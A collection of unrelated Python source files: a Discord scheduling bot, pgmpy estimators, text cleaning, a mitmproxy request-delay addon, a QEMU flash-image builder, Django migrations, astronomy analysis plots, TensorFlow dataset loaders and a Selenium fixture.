<reponame>dcutting133/schedule-bot import os import discord from discord.ext import commands import config from admins import admin_list class ScheduleBot(): def __init__(self, client, admins): self.config = config self.admins = admins self.client = client self.on_ready = self.client.event(self.on_ready) def start_bot(self): self.client.run(config.bot_token) def load_cogs(self): for filename in os.listdir('./cogs'): if filename.endswith('.py'): print("Loaded Cog: ", f'cogs.{filename[:-3]}') self.client.load_extension(f'cogs.{filename[:-3]}') #admin only bool function def is_admin(ctx): is_admin = False for admin in self.admins: if ctx.message.author.id == admin: is_admin = True return is_admin #ready prompt async def on_ready(self): print("Scheduler Bot is ready.") print("Logged in as: ", self.client.user) print("ID: ", self.client.user.id) #load commands @commands.command() @commands.check(is_admin) async def load(ctx, extension): self.client.load_extension(f'cogs.{extension}') #unload commands @commands.command() @commands.check(is_admin) async def unload(ctx, extension): self.client.unload_extension(f'cogs.{extension}') #reload commands @commands.command() @commands.check(is_admin) async def reload(ctx, extension): self.client.unload_extension(f'cogs.{extension}') self.client.load_extension(f'cogs.{extension}') def main(): client = commands.Bot(command_prefix = config.command_prefix) bot = ScheduleBot(client, admin_list) bot.load_cogs() # load cogs before starting the bot bot.start_bot() if __name__ == '__main__': main()
1.734375
2
pgmpy/estimators/base.py
akleinau/pgmpy
2,144
12754091
#!/usr/bin/env python from functools import lru_cache import pandas as pd from pgmpy.utils.decorators import convert_args_tuple class BaseEstimator(object): def __init__(self, data=None, state_names=None, complete_samples_only=True): """ Base class for estimators in pgmpy; `ParameterEstimator`, `StructureEstimator` and `StructureScore` derive from this class. Parameters ---------- data: pandas DataFrame object datafame object where each column represents one variable. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. """ self.data = data # data can be None in the case when learning structre from # independence conditions. Look into PC.py. if self.data is not None: self.complete_samples_only = complete_samples_only self.variables = list(data.columns.values) if not isinstance(state_names, dict): self.state_names = { var: self._collect_state_names(var) for var in self.variables } else: self.state_names = dict() for var in self.variables: if var in state_names: if not set(self._collect_state_names(var)) <= set( state_names[var] ): raise ValueError( f"Data contains unexpected states for variable: {var}." ) self.state_names[var] = state_names[var] else: self.state_names[var] = self._collect_state_names(var) def _collect_state_names(self, variable): "Return a list of states that the variable takes in the data." states = sorted(list(self.data.loc[:, variable].dropna().unique())) return states @convert_args_tuple @lru_cache(maxsize=2048) def state_counts( self, variable, parents=[], complete_samples_only=None, weighted=False ): """ Return counts how often each state of 'variable' occurred in the data. If a list of parents is provided, counting is done conditionally for each state configuration of the parents. Parameters ---------- variable: string Name of the variable for which the state count is to be done. parents: list Optional list of variable parents, if conditional counting is desired. Order of parents in list is reflected in the returned DataFrame complete_samples_only: bool Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.NaN` somewhere are ignored. If `False` then every row where neither the variable nor its parents are `np.NaN` is used. Desired default behavior can be passed to the class constructor. weighted: bool If True, data must have a `_weight` column specifying the weight of the datapoint (row). If False, each datapoint has a weight of `1`. Returns ------- state_counts: pandas.DataFrame Table with state counts for 'variable' Examples -------- >>> import pandas as pd >>> from pgmpy.estimators import BaseEstimator >>> data = pd.DataFrame(data={'A': ['a1', 'a1', 'a2'], 'B': ['b1', 'b2', 'b1'], 'C': ['c1', 'c1', 'c2']}) >>> estimator = BaseEstimator(data) >>> estimator.state_counts('A') A a1 2 a2 1 >>> estimator.state_counts('C', parents=['A', 'B']) A a1 a2 B b1 b2 b1 b2 C c1 1 1 0 0 c2 0 0 1 0 >>> estimator.state_counts('C', parents=['A']) A a1 a2 C c1 2.0 0.0 c2 0.0 1.0 """ parents = list(parents) # default for how to deal with missing data can be set in class constructor if complete_samples_only is None: complete_samples_only = self.complete_samples_only # ignores either any row containing NaN, or only those where the variable or its parents is NaN data = ( self.data.dropna() if complete_samples_only else self.data.dropna(subset=[variable] + parents) ) if weighted and ("_weight" not in self.data.columns): raise ValueError("data must contain a `_weight` column if weighted=True") if not parents: # count how often each state of 'variable' occured if weighted: state_count_data = data.groupby([variable]).sum()["_weight"] else: state_count_data = data.loc[:, variable].value_counts() state_counts = ( state_count_data.reindex(self.state_names[variable]) .fillna(0) .to_frame() ) else: parents_states = [self.state_names[parent] for parent in parents] # count how often each state of 'variable' occured, conditional on parents' states if weighted: state_count_data = ( data.groupby([variable] + parents).sum()["_weight"].unstack(parents) ) else: state_count_data = ( data.groupby([variable] + parents).size().unstack(parents) ) if not isinstance(state_count_data.columns, pd.MultiIndex): state_count_data.columns = pd.MultiIndex.from_arrays( [state_count_data.columns] ) # reindex rows & columns to sort them and to add missing ones # missing row = some state of 'variable' did not occur in data # missing column = some state configuration of current 'variable's parents # did not occur in data row_index = self.state_names[variable] column_index = pd.MultiIndex.from_product(parents_states, names=parents) state_counts = state_count_data.reindex( index=row_index, columns=column_index ).fillna(0) return state_counts class ParameterEstimator(BaseEstimator): def __init__(self, model, data, **kwargs): """ Base class for parameter estimators in pgmpy. Parameters ---------- model: pgmpy.models.BayesianNetwork or pgmpy.models.MarkovNetwork or pgmpy.models.NoisyOrModel model for which parameter estimation is to be done. data: pandas DataFrame object datafame object with column names identical to the variable names of the model. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. """ if not (set(model.nodes()) - model.latents) <= set(data.columns.values): raise ValueError( "variable names of the model must be identical to column names in data" ) self.model = model super(ParameterEstimator, self).__init__(data, **kwargs) def state_counts(self, variable, weighted=False, **kwargs): """ Return counts how often each state of 'variable' occurred in the data. If the variable has parents, counting is done conditionally for each state configuration of the parents. Parameters ---------- variable: string Name of the variable for which the state count is to be done. complete_samples_only: bool Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.NaN` somewhere are ignored. If `False` then every row where neither the variable nor its parents are `np.NaN` is used. Desired default behavior can be passed to the class constructor. Returns ------- state_counts: pandas.DataFrame Table with state counts for 'variable' Examples -------- >>> import pandas as pd >>> from pgmpy.models import BayesianNetwork >>> from pgmpy.estimators import ParameterEstimator >>> model = BayesianNetwork([('A', 'C'), ('B', 'C')]) >>> data = pd.DataFrame(data={'A': ['a1', 'a1', 'a2'], 'B': ['b1', 'b2', 'b1'], 'C': ['c1', 'c1', 'c2']}) >>> estimator = ParameterEstimator(model, data) >>> estimator.state_counts('A') A a1 2 a2 1 >>> estimator.state_counts('C') A a1 a2 B b1 b2 b1 b2 C c1 1 1 0 0 c2 0 0 1 0 """ parents = sorted(self.model.get_parents(variable)) return super(ParameterEstimator, self).state_counts( variable, parents=parents, weighted=weighted, **kwargs ) class StructureEstimator(BaseEstimator): def __init__(self, data=None, independencies=None, **kwargs): """ Base class for structure estimators in pgmpy. Parameters ---------- data: pandas DataFrame object datafame object where each column represents one variable. (If some values in the data are missing the data cells should be set to `numpy.NaN`. Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.) state_names: dict (optional) A dict indicating, for each variable, the discrete set of states (or values) that the variable can take. If unspecified, the observed values in the data set are taken to be the only possible states. complete_samples_only: bool (optional, default `True`) Specifies how to deal with missing data, if present. If set to `True` all rows that contain `np.Nan` somewhere are ignored. If `False` then, for each variable, every row where neither the variable nor its parents are `np.NaN` is used. This sets the behavior of the `state_count`-method. """ self.independencies = independencies if self.independencies is not None: self.variables = self.independencies.get_all_variables() super(StructureEstimator, self).__init__(data=data, **kwargs) def estimate(self): pass
2.421875
2
gensim2/punctuation_sub.py
arfu2016/DuReader
0
12754219
""" @Project : DuReader @Module : punctuation_sub.py @Author : Deco [<EMAIL>] @Created : 5/16/18 1:36 PM @Desc : """ import string import re def clean_sentence(st): intab = string.punctuation + '。,“”‘’():;?·—《》、' outtab = ' ' table = str.maketrans(dict.fromkeys(intab, outtab)) st1 = st.translate(table) return st1 def clean_sentence2(st): """ 数据预处理 :param st: string :return: string """ in_tab = r'''[{}]''' out_tab = ' ' # out_tab = 'p' clean = re.sub(in_tab, out_tab, st) return clean def clean_sentence3(st): """ 数据预处理 :param st: string :return: string """ in_tab = '[' + string.punctuation + '。,“”‘’():;?·—《》、' + ']' out_tab = '' clean = re.sub(in_tab, out_tab, st) return clean def clean_sentence4(st): """ 数据预处理 :param st: string :return: string """ in_tab = string.punctuation + '。,“”‘’():;?·—《》、' clean = ''.join([c for c in st if c not in in_tab]) # string search, time complexity m*O(n) return clean def clean_sentence5(st): """ 数据预处理 :param st: string :return: string """ in_tab = string.punctuation + '。,“”‘’():;?·—《》、' pt = set(p for p in in_tab) clean = ''.join([c for c in st if c not in pt]) # hash search, time complexity m*O(1) return clean if __name__ == "__main__": print(string.punctuation) print(clean_sentence4('The period will be removed.')) print(clean_sentence5('The period will be removed.'))
2.609375
3
sleeper.py
580/mitmproxy-addons
5
12754347
import time from typing import Optional from mitmproxy import ctx from mitmproxy import flowfilter from mitmproxy.script import concurrent from mitmproxy.exceptions import OptionsError matchall = flowfilter.parse(".") class Sleeper: def __init__(self): self.filter: Optional[flowfilter.TFilter] = matchall def load(self, loader): loader.add_option( "sleep", Optional[int], None, "Delay client requests (milliseconds)", ) loader.add_option( "sleep_filter", Optional[str], None, "Apply delay to flows which match the filter" ) def configure(self, updates): if "sleep" in updates: sleep = ctx.options.sleep if sleep and sleep < 0: raise OptionsError("'sleep' must be >= 0") if "sleep_filter" in updates: filt_str = ctx.options.sleep_filter filt = matchall if not filt_str else flowfilter.parse(filt_str) if not filt: raise OptionsError("Invalid filter expression: %s" % filt_str) self.filter = filt @concurrent def request(self, flow): delay = ctx.options.sleep if delay and delay > 0 and flowfilter.match(self.filter, flow): time.sleep(delay / 1000) addons = [ Sleeper() ]
1.554688
2
pytest-embedded-qemu/pytest_embedded_qemu/app.py
Ouss4/pytest-embedded
0
12754475
import os from typing import Optional from pytest_embedded.log import PexpectProcess, cls_redirect_stdout, live_print_call from pytest_embedded_idf.app import IdfApp from . import DEFAULT_IMAGE_FN class IdfFlashImageMaker: """ Create a single image for qemu based on the `IdfApp`'s partition table and all the flash files. """ def __init__(self, app: IdfApp, image_path: str): """ Args: app: `IdfApp` instance image_path: output image path """ self.app = app self.image_path = image_path def make_bin(self) -> None: """ Create a single image file for qemu. """ # flash files is sorted, if the first offset is not 0x0, we need to fill in with empty bin if self.app.flash_files[0][0] != 0x0: self._write_empty_bin(count=self.app.flash_files[0][0]) for offset, file_path, encrypted in self.app.flash_files: if encrypted: raise NotImplementedError('will implement later') else: self._write_bin(file_path, seek=offset) def _write_empty_bin(self, count: int, bs: int = 1024, seek: int = 0): live_print_call( f'dd if=/dev/zero bs={bs} count={count} seek={seek} of={self.image_path}', shell=True, ) def _write_bin(self, binary_filepath, bs: int = 1, seek: int = 0): live_print_call( f'dd if={binary_filepath} bs={bs} seek={seek} of={self.image_path} conv=notrunc', shell=True, ) def _write_encrypted_bin(self, binary_filepath, bs: int = 1, seek: int = 0): live_print_call( f'dd if=/dev/zero bs=1 count=32 of=key.bin', shell=True, ) # generate a fake key bin live_print_call( f'espsecure.py encrypt_flash_data --keyfile key.bin --output decrypted.bin --address {seek} ' f'{binary_filepath}', shell=True, ) self._write_bin('decrypted.bin', bs=bs, seek=seek) def _burn_efuse(self): pass class QemuApp(IdfApp): """ QEMU App class Attributes: pexpect_proc (PexpectProcess): pexpect process image_path (str): QEMU flash-able bin path """ def __init__( self, pexpect_proc: PexpectProcess, app_path: Optional[str] = None, build_dir: Optional[str] = None, part_tool: Optional[str] = None, qemu_image_path: Optional[str] = None, **kwargs, ): """ Args: pexpect_proc: pexpect process app_path: App path build_dir: Build directory part_tool: Partition tool path qemu_image_path: QEMU flashable bin path """ super().__init__(app_path, build_dir=build_dir, part_tool=part_tool, **kwargs) self.pexpect_proc = pexpect_proc self.image_path = qemu_image_path or os.path.join(self.app_path, DEFAULT_IMAGE_FN) if self.target != 'esp32': raise ValueError('For now on QEMU we only support ESP32') self.create_image() @cls_redirect_stdout(source='create image') def create_image(self) -> None: """ Create the image if not exists """ if os.path.exists(self.image_path): print(f'Using image already exists: {self.image_path}') else: image_maker = IdfFlashImageMaker(self, self.image_path) image_maker.make_bin()
1.671875
2
xperiment.py
jluini/julo-doc
0
12754603
<filename>xperiment.py from julodoc.tree.julotree import t, JuloTree from julopedia.models import Author, Node from django.utils import timezone import pypandoc from pandocfilters import applyJSONFilters, Str import json def xper(): authors = Author.objects.all() if not len(authors): print("No hay autores") return author = authors[0] node = Node( node_type = 1, title = "Título", content = "# Heading\n\nEste es un párrafo.\n\n# Otro heading\n\nOtro párrafo.\n", author = author, modification_date = timezone, parent = None ) print("Node created") print(node) print(" OK") tree = t.fromMarkdown(node.content) print(tree.json) print("------------------") print(tree.toHtml()) def toCaps(key, value, format, meta): if key == 'Str': return Str(value.upper()) jsonText = applyJSONFilters([toCaps], tree.json, "") class Obj: def __init__(self, str): self.str = str def read(self): return self.str obj = Obj(jsonText) jsonTree = json.load(obj) return jsonTree def nodeToHtml(node): markdown = node.content #ret = pypandoc.convert_text(article.article_body, 'html', format='markdown+tex_math_double_backslash', extra_args=['--mathjax']) ret = pypandoc.convert_text(markdown, 'html', format='markdown', extra_args=['--mathjax']) return ret
1.640625
2
backend/common/migrations/0004_add_contributors_through.py
bwhicks/PlinyProject
0
12754731
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-04-13 18:21 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('common', '0003_delete_contributors'), ] operations = [ migrations.CreateModel( name='WorkContributor', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('contribution_type', models.PositiveSmallIntegerField(choices=[(0, 'Author'), (1, 'Editor'), (2, 'Translator')])), ('order', models.PositiveSmallIntegerField(default=0)), ], ), migrations.RemoveField( model_name='contributor', name='contributor_type', ), migrations.RemoveField( model_name='contributor', name='order', ), migrations.AddField( model_name='workcontributor', name='contributor', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Contributor'), ), migrations.AddField( model_name='workcontributor', name='work', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='common.Work'), ), migrations.AddField( model_name='work', name='contributors', field=models.ManyToManyField(through='common.WorkContributor', to='common.Contributor'), ), ]
1.234375
1
scripts/analysis/desi/plot_sv3.py
mehdirezaie/LSSutils
1
12754859
""" Plot SV3 Results """ # LRGs import sys sys.path.append('/home/mehdi/github/LSSutils') import matplotlib.pyplot as plt from matplotlib.backends.backend_pdf import PdfPages import healpy as hp import numpy as np from time import time import fitsio as ft from lssutils.lab import (make_overdensity, AnaFast, histogram_cell, hpixsum, get_meandensity) from lssutils.stats.pcc import pcc from lssutils.dataviz import setup_color import pandas as pd root_dir = '/home/mehdi/data/dr9v0.57.0/' def cutphotmask(aa, bits): print(f'{len(aa)} before imaging veto') keep = (aa['NOBS_G']>0) & (aa['NOBS_R']>0) & (aa['NOBS_Z']>0) for biti in bits: keep &= ((aa['MASKBITS'] & 2**biti)==0) print(f'{keep.sum()} after imaging veto') print(keep) return keep class SV3Data: def __init__(self, target, region, mversion): columns = ['RA', 'DEC', 'NOBS_R', 'NOBS_G', 'NOBS_Z', 'MASKBITS'] bits = [1, 5, 6, 7, 8, 9, 11, 12, 13] self.nside = 256 p = f'{root_dir}sv3_v1/' self.dcat = ft.read(f'{p}sv3target_{target}_{region}.fits', columns=columns) self.rcat = ft.read(f'{p}{region}_randoms-1-0x2.fits', columns=columns) self.wrf = ft.read(f'{p}sv3target_{target}_{region}.fits_EdWsys/wsys_v0.fits')['wsys'] self.wnn = ft.read(f'{p}sv3target_{target}_{region}.fits_MrWsys/wsys_{mversion}.fits')['wsys'] ix_d = cutphotmask(self.dcat, bits) self.dcat = self.dcat[ix_d] self.wrf = self.wrf[ix_d] self.wnn = self.wnn[ix_d] ix_r = cutphotmask(self.rcat, bits) self.rcat = self.rcat[ix_r] print(f'mean(wrf): {self.wrf.mean():.2f}, {self.wrf.min():.1f} < wrf < {self.wrf.max():.1f}') print(f'mean(wnn): {self.wnn.mean():.2f}, {self.wnn.min():.1f} < wnn < {self.wnn.max():.1f}') self.af = AnaFast() tmpl = pd.read_hdf(f'/home/mehdi/data/templates/dr9/pixweight_dark_dr9m_nside{self.nside}.h5') #self.cols = ['nstar', 'ebv', 'loghi']\ # +[f'{s}_{b}' for s in ['ccdskymag_mean', 'fwhm_mean', 'fwhm_min', 'fwhm_max', 'depth_total', # 'mjd_mean', 'mjd_min', 'mjd_max', 'airmass_mean', 'exptime_total']\ # for b in ['g', 'r', 'z']] self.cols = ['stardens', 'ebv', 'loghi', 'psfdepth_g', 'psfdepth_r', 'psfdepth_z', 'galdepth_g', 'galdepth_r', 'galdepth_z', 'psfsize_g', 'psfsize_r', 'psfsize_z', 'psfdepth_w1', 'psfdepth_w2'] self.tmpl = tmpl[self.cols].values def make_delta(self): nran = hpixsum(self.nside, self.rcat['RA'], self.rcat['DEC'])*1.0 self.mask = (nran > 0) print(f'mask: {self.mask.sum()} pixels') is_good = np.isfinite(self.tmpl).sum(axis=1) == len(self.cols) self.mask &= is_good print(f'mask: {self.mask.sum()} pixels (with imaging)') self.frac = nran / nran[self.mask].mean() self.mask &= (self.frac > 0.2) print(f'mask: {self.mask.sum()} pixels (with frac>0.2)') self.ngal_now = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'])*1.0 self.ngal_rf = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'], weights=self.wrf) self.ngal_wnn = hpixsum(self.nside, self.dcat['RA'], self.dcat['DEC'], weights=self.wnn) self.delta_now = make_overdensity(self.ngal_now, self.frac, self.mask) self.delta_rf = make_overdensity(self.ngal_rf, self.frac, self.mask) self.delta_wnn = make_overdensity(self.ngal_wnn, self.frac, self.mask) def make_cl(self): self.cl_now = self.af(self.delta_now, self.frac, self.mask) self.cl_rf = self.af(self.delta_rf, self.frac, self.mask) self.cl_nn = self.af(self.delta_wnn, self.frac, self.mask) def make_nbar(self): self.nbar_now = get_meandensity(self.ngal_now, self.frac, self.mask, self.tmpl) self.nbar_rf = get_meandensity(self.ngal_rf, self.frac, self.mask, self.tmpl) self.nbar_nn = get_meandensity(self.ngal_wnn, self.frac, self.mask, self.tmpl) def make_pcc(self): self.pcc_now = pcc(self.tmpl[self.mask], self.delta_now[self.mask], return_err=True) self.pcc_rf = pcc(self.tmpl[self.mask], self.delta_rf[self.mask]) self.pcc_nn = pcc(self.tmpl[self.mask], self.delta_wnn[self.mask]) setup_color() region = sys.argv[1] # NDECALS target = sys.argv[2] # QSO mversion = sys.argv[3] assert region in ['NDECALS', 'SDECALS', 'NBMZLS', 'DES', 'SDECALS_noDES', 'DES_noLMC'] assert target in ['QSO', 'LRG', 'ELG', 'BGS_ANY'] print(f'target: {target}, region: {region}, mversion: {mversion}') target_region = f'{target}-{region}-{mversion}' t0 = time() sv = SV3Data(target, region, mversion) t1 = time() print(f'Finished reading in {t1-t0:.1f} sec') sv.make_delta() t2 = time() print(f'Finished deltas in {t2-t1:.1f} sec') sv.make_cl() t3 = time() print(f'Finished Cell in {t3-t2:.1f} sec') sv.make_nbar() t4 = time() print(f'Finished nbar in {t4-t3:.1f} sec') sv.make_pcc() t5 = time() print(f'Finished pcc in {t5-t4:.1f} sec') pp = PdfPages(''.join([f'{root_dir}sv3_v1/', target_region, '.pdf'])) # C_ell methods = ['No weight', 'RF weight', 'NN weight'] cls = [sv.cl_now, sv.cl_rf, sv.cl_nn] fg, ax = plt.subplots(figsize=(8, 6)) for n_i, cl_i in zip(methods, cls ): lb, clb = histogram_cell(cl_i['cl'], bins=np.logspace(0, np.log10(770), 10)) l_, = ax.plot(cl_i['cl'], lw=1, zorder=-1, alpha=0.2) ax.plot(lb, clb, marker='.', mfc='w', ls='None', color=l_.get_color(), label=n_i) ax.legend(title=target_region, frameon=False) ax.set(xscale='log', yscale='log', ylim=(2.0e-8, 8.0e-3), xlabel=r'$\ell$', ylabel=r'C$_{\ell}$') #fg.savefig('cl_lrg_bmzls.png', dpi=300, bbox_inches='tight') pp.savefig(bbox_inches='tight') # Nbar fig, ax = plt.subplots(ncols=3, nrows=5, figsize=(22, 25), sharey=True) fig.subplots_adjust(hspace=0.35, wspace=0.1) ax = ax.flatten() nbars = [sv.nbar_now, sv.nbar_rf, sv.nbar_nn] for name_i, nbar_i in zip(methods, nbars): for j, nbar_ij in enumerate(nbar_i): ax[j].plot(nbar_ij['bin_avg'], nbar_ij['nnbar'], marker='.', mfc='w', label=name_i) if name_i == 'No weight': ax[j].fill_between(nbar_ij['bin_avg'], 1-nbar_ij['nnbar_err'], 1+nbar_ij['nnbar_err'], color='grey', alpha=0.2, zorder=-1) ax[2].legend(title=target_region, frameon=False) for j, colj in enumerate(sv.cols): ax[j].set_xlabel(colj) if j%3==0: ax[j].set_ylabel('Mean Density') pp.savefig(bbox_inches='tight') # PCC fg, ax = plt.subplots(figsize=(12, 4)) x_columns = np.arange(len(sv.cols)) ax.set_xticks(x_columns) ax.set_xticklabels(sv.cols, rotation=90) pcc_min, pcc_max = np.percentile(sv.pcc_now[1], [2.5, 97.5], axis=0) ax.bar(x_columns-0.25, sv.pcc_now[0], width=0.25, label='No weight') ax.bar(x_columns, sv.pcc_rf[0], width=0.25, label='RF') ax.bar(x_columns+0.25, sv.pcc_nn[0], width=0.25, label='NN') ax.fill_between(x_columns, pcc_min, pcc_max, color='grey', alpha=0.2, zorder=10) ax.legend(title=target_region, frameon=False) ax.grid(ls=':') ax.set(ylabel='PCC') pp.savefig(bbox_inches='tight') pp.close()
1.898438
2
research/domain_adaptation/datasets/mixed.py
runchida/models
0
12754987
<filename>research/domain_adaptation/datasets/mixed.py from __future__ import absolute_import from __future__ import division from __future__ import print_function import os # Dependency imports import tensorflow as tf import numpy as np from research.slim.datasets import dataset_utils slim = tf.contrib.slim _FILE_PATTERN_ONE_CLASS = {'mnist': 'mnist_%s_%s.tfrecord', 'mnist_m': 'mnist_m_%s_%s.tfrecord'} _SPLITS_TO_SIZES = {'train': 58001, 'valid': 1000, 'test': 9001} _NUM_CLASSES = 10 _ITEMS_TO_DESCRIPTIONS = { 'image': 'A [28 x 28 x 1] grayscale image.', 'label': 'A single integer between 0 and 9', } _ITEMS_TO_DESCRIPTIONS_MNIST_M = { 'image': 'A [32 x 32 x 1] RGB image.', 'label': 'A single integer between 0 and 9', } def get_split(split_name, dataset_dir, labels_one, labels_two, file_pattern=None): # get tf.data.Dataset # tf.enable_eager_execution() if split_name not in _SPLITS_TO_SIZES: raise ValueError('split name %s was not recognized.' % split_name) file_list_mnist, file_list_mnist_m = get_file_list(dataset_dir, file_pattern, split_name, labels_one, labels_two) dataset_mnist = tf.data.TFRecordDataset(file_list_mnist) dataset_mnist_m = tf.data.TFRecordDataset(file_list_mnist_m) dataset_mnist = dataset_mnist.map(decode_gray) dataset_mnist_m = dataset_mnist_m.map(decode_rgb) # tf.data.Dataset return dataset_mnist, dataset_mnist_m # def get_split(split_name, dataset_dir, labels_one, labels_two, file_pattern=None, reader=None): # """Gets a dataset tuple with instructions for reading MNIST. # # Args: # split_name: A train/test split name. # dataset_dir: The base directory of the dataset sources. # file_pattern: The file pattern to use when matching the dataset sources. # It is assumed that the pattern contains a '%s' string so that the split # name can be inserted. # reader: The TensorFlow reader type. # # Returns: # A `Dataset` namedtuple. # # Raises: # ValueError: if `split_name` is not a valid train/test split. # """ # if split_name not in _SPLITS_TO_SIZES: # raise ValueError('split name %s was not recognized.' % split_name) # # if not file_pattern: # file_list = get_file_list(dataset_dir, file_pattern, split_name, labels_one, labels_two) # # # Allowing None in the signature so that dataset_factory can use the default. # if reader is None: # reader = tf.TFRecordReader # # keys_to_features = { # 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), # 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), # 'image/class/label': tf.FixedLenFeature( # [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), # } # # items_to_handlers = { # 'image': slim.tfexample_decoder.Image(shape=[28, 28, 1], channels=1), # 'label': slim.tfexample_decoder.Tensor('image/class/label', shape=[]), # } # # decoder = slim.tfexample_decoder.TFExampleDecoder( # keys_to_features, items_to_handlers) # # labels_to_names = None # if dataset_utils.has_labels(dataset_dir): # labels_to_names = dataset_utils.read_label_file(dataset_dir) # # return slim.dataset.Dataset( # data_sources=file_list, # reader=reader, # decoder=decoder, # num_samples=_SPLITS_TO_SIZES[split_name], # num_classes=_NUM_CLASSES, # items_to_descriptions=_ITEMS_TO_DESCRIPTIONS, # labels_to_names=labels_to_names) def decode_gray(serialized_example): """ Parses an image and label from the given `serialized_example`. It is used as a map function for `dataset.map` """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), 'image/class/label': tf.FixedLenFeature( [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), } # 1. define a parser parsed_dataset = tf.io.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features=keys_to_features) # # # 2. Convert the data image = tf.io.decode_png(parsed_dataset['image/encoded'], channels=0, dtype=tf.uint8) label = tf.cast(parsed_dataset['image/class/label'], tf.uint8) image = tf.image.convert_image_dtype(image, tf.float32) image = tf.image.grayscale_to_rgb(image) image = tf.image.resize_images(image, [32, 32]) label = tf.reshape(label, shape=[]) return image, label def decode_rgb(serialized_example): """ Parses an image and label from the given `serialized_example`. It is used as a map function for `dataset.map` """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='raw'), 'image/class/label': tf.FixedLenFeature( [1], tf.int64, default_value=tf.zeros([1], dtype=tf.int64)), } # 1. define a parser parsed_dataset = tf.io.parse_single_example( serialized_example, # Defaults are not specified since both keys are required. features=keys_to_features) # # # 2. Convert the data image = tf.io.decode_png(parsed_dataset['image/encoded'], channels=0, dtype=tf.uint8) label = tf.cast(parsed_dataset['image/class/label'], tf.uint8) image = tf.image.convert_image_dtype(image, tf.float32) image = tf.image.resize_images(image, [32, 32]) image = tf.reshape(image, [32, 32, 3]) label = tf.reshape(label, shape=[]) return image, label def get_class_labels(num_classes): # get lists of labels for source and target domains # labels one if num_classes < 5: raise ValueError('Number of classes must be between 5 to 10') class_labels_source_one = [] fill_list(class_labels_source_one, num_classes) # labels two class_labels_source_two = [] class_labels_test_one = [] for x in range(0, 10): append = not (has_number(class_labels_source_one, x)) if append: class_labels_source_two.append(x) class_labels_test_one.append(x) fill_list(class_labels_source_two, num_classes) class_labels_test_two = [] for x in range(0, 10): append = not (has_number(class_labels_source_two, x)) if append: class_labels_test_two.append(x) labels = { 'labels1': class_labels_source_one, 'labels2': class_labels_source_two, 'labels3': class_labels_test_one, 'labels4': class_labels_test_two } return labels def fill_list(list, num_classes): # fill a list with numbers until it has 'num_classes' members while len(list) < num_classes: randnum = np.random.randint(0, 10) append = not (has_number(list, randnum)) if append: list.append(randnum) return list def has_number(list, num): # check if a list contains number num check = False for member in list: if member == num: check = True return check def get_file_list(dataset_dir, file_pattern, split_name, labels_mnist, labels_mnist_m): # create list of files lead to mnist with labels_one and mnist-m with labels_two # lists of paths to separated tfrecord for mixed-domain case file_list_mnist = [] file_list_mnist_m = [] if not file_pattern: for class_label in labels_mnist: file_pattern = _FILE_PATTERN_ONE_CLASS['mnist'] file_pattern = os.path.join(dataset_dir, 'mix', file_pattern % (split_name, str(class_label))) file_list_mnist.append(file_pattern) for class_label in labels_mnist_m: file_pattern = _FILE_PATTERN_ONE_CLASS['mnist_m'] file_pattern = os.path.join(dataset_dir, 'mix', file_pattern % (split_name, str(class_label))) file_list_mnist_m.append(file_pattern) return file_list_mnist, file_list_mnist_m else: return file_pattern def get_train_log_dir(training_name): experiment_dir = os.path.join('/home', 'runchi', 'thesis', 'graphs', 'experiment') # experiment_dir = os.path.join('/home', 'rk64vona', 'thesis', 'graphs', 'experiment') train_log_dir = os.path.join(experiment_dir, '%s/' % training_name) if not tf.gfile.Exists(train_log_dir): tf.gfile.MkDir(train_log_dir) retrain = False else: retrain = True return train_log_dir, retrain def write_label(train_log_dir, labels): dataset_utils.write_mixed_labels(train_log_dir, labels) def read_mixed_labels(train_log_dir): return dataset_utils.read_mixed_labels(train_log_dir)
1.546875
2
fixture/application.py
natalianik/python_training
0
12755115
<gh_stars>0 import pytest import _pytest from selenium.webdriver.firefox.webdriver import WebDriver from fixture.session import SessionHelper from fixture.group import GroupHelper from fixture.contact import ContactHelper # __author__ = 'Natalia.Nikonova' class Application: def __init__(self): self.wd = WebDriver() self.session = SessionHelper(self) self.group = GroupHelper(self) self.contact = ContactHelper(self) def is_valid(self): try: self.wd.current_url return True except: return False def open_home_page(self): wd = self.wd wd.get("http://localhost/addressbook/") def destroy(self): self.wd.quit()
1.585938
2
Ene-Jun-2022/saul-alejandro-cavazos-nelson/practica_1_comandos_de_python.py
KevinBR117/DAS_Sistemas
1
12755243
